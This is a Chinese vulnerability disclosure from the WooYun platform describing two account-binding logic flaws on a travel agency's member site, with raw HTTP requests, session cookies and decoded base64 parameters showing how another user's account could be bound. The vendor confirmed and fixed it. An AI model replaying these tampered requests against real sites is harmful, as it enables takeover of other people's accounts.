当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122638

漏洞标题:旅游安全之国旅存在缺陷影响任意用户(2处)

相关厂商:中国国旅

漏洞作者: harbour_bin

提交时间:2015-06-25 11:25

修复时间:2015-08-09 11:40

公开时间:2015-08-09 11:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

旅游安全之国旅个人中心存在缺陷影响任意用户(2处)
PS:本来还有一个的,发现危害性不好判定,就不提交了

详细说明:

1、个人中心绑定邮箱

绑定邮箱.jpg


随便写一个邮箱帐号

绑定邮箱1.jpg


QQ截图20150625092140.jpg


修改Email处的信息

绑定邮箱2.jpg


可以给已经注册的帐号发邮件了,说明只进行了客户端验证

QQ截图20150625092446.jpg


2、另一处绑定问题
两个已经注册的账号

帐号1.jpg


帐号2.jpg


发送信息
POST http://www.cits.cn/member/bind.html HTTP/1.1
Host: www.cits.cn
Proxy-Connection: keep-alive
Content-Length: 92
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.cits.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.cits.cn/member/bind.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: citsuuid=A1B8A831-5B9C-4638-B13D-EB0469A81A8E; HTjustId=35; HTjustName=%E9%A6%99%E6%B8%AF%E6%96%87%E5%8D%8E%E4%B8%9C%E6%96%B9%E9%85%92%E5%BA%97; HTjustUrl=%2Fhotel%2Fdetail%2F35.html%3Fcity_id%3D30000898; HTjustImage=http%3A%2F%2Ffile5.cits.cn%2Fhotel%2Fjielv_img%2F35%2F35_297.jpg; HTjustPrice=0; Hm_lvt_2496684fc50525da3fb986826f3d01da=1434700404; HOST_DOMAIN_USER=nj.cits.cn; JSESSIONIDB2C=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742; HTTPSESSIONIDB2C=b6fb58886bf9c1ba2c113b29a3a8f719; CitsOnlineLoginId=17701591416; CitsOnlineLoginType=mobile; CitsOnlineLoginMode=true; CROSS_CITS_GO=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742!1435192142230new; HOST_DOMAIN_PAGE=nj.cits.cn; Hm_lvt_e7bdd9d92a22943295c3a60a605361b3=1435148485,1435148720,1435192152,1435192262; Hm_lpvt_e7bdd9d92a22943295c3a60a605361b3=1435192758; CNZZDATA1254452230=1901146286-1431946488-http%253A%252F%252Fwww.baidu.com%252F%7C1435192109; _gscu_962565170=319519027udzfn70; _gscs_962565170=351921533scito30|pv:50; _gscbrs_962565170=1
citsTooken=dabe9168-f8fc-4e42-9585-0b62551f3ff7&email=wooyun_test%40163.com&type=SendEmalVfc


邮箱验证

wooyun_test.jpg


绑定信息

GET http://www.cits.cn/member/bind.html?type=bindEmail&sendTime=MjAxNS0wNi0yNSAwODo0MQ==&login_id=YzIwMDA0OTgxMDE=&password=MmQ3YTJkYTg1NjQ4NjA2ZDRlMTg5YjI1YjI2MmMzYjQ=&email=d29veXVuX3Rlc3RAMTYzLmNvbQ==&loginnametype=bW9iaWxl HTTP/1.1
Host: www.cits.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://mail.163.com/js6/main.jsp?sid=eBHcsAUfaAUaInyqjQffipJFuafqRVYh&df=unireg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: citsuuid=A1B8A831-5B9C-4638-B13D-EB0469A81A8E; HTjustId=35; HTjustName=%E9%A6%99%E6%B8%AF%E6%96%87%E5%8D%8E%E4%B8%9C%E6%96%B9%E9%85%92%E5%BA%97; HTjustUrl=%2Fhotel%2Fdetail%2F35.html%3Fcity_id%3D30000898; HTjustImage=http%3A%2F%2Ffile5.cits.cn%2Fhotel%2Fjielv_img%2F35%2F35_297.jpg; HTjustPrice=0; Hm_lvt_2496684fc50525da3fb986826f3d01da=1434700404; HOST_DOMAIN_USER=nj.cits.cn; JSESSIONIDB2C=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742; HTTPSESSIONIDB2C=b6fb58886bf9c1ba2c113b29a3a8f719; CitsOnlineLoginId=17701591416; CitsOnlineLoginType=mobile; CitsOnlineLoginMode=true; CROSS_CITS_GO=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742!1435192142230new; HOST_DOMAIN_PAGE=nj.cits.cn; Hm_lvt_e7bdd9d92a22943295c3a60a605361b3=1435148485,1435148720,1435192152,1435192262; Hm_lpvt_e7bdd9d92a22943295c3a60a605361b3=1435192875; CNZZDATA1254452230=1901146286-1431946488-http%253A%252F%252Fwww.baidu.com%252F%7C1435192109; _gscu_962565170=319519027udzfn70; _gscs_962565170=351921533scito30|pv:51; _gscbrs_962565170=1


base64位加密,解密后
sendTime=MjAxNS0wNi0yNSAwODo0MQ== 2015-06-25 08:41
login_id=YzIwMDA0OTgxMDE= c2000498101
password=MmQ3YTJkYTg1NjQ4NjA2ZDRlMTg5YjI1YjI2MmMzYjQ= 2d7a2da85648606d4e189b25b262c3b4(md5)wooyun123
email=d29veXVuX3Rlc3RAMTYzLmNvbQ== [email protected]
loginnametype=bW9iaWxl
修改邮箱为[email protected]后,得到

burpsuit.jpg


最后

1207727511.jpg


帐号3.jpg

漏洞证明:

已证明!

修复方案:

加强服务器验证!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-06-25 11:39

厂商回复:

非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。

最新状态:

暂无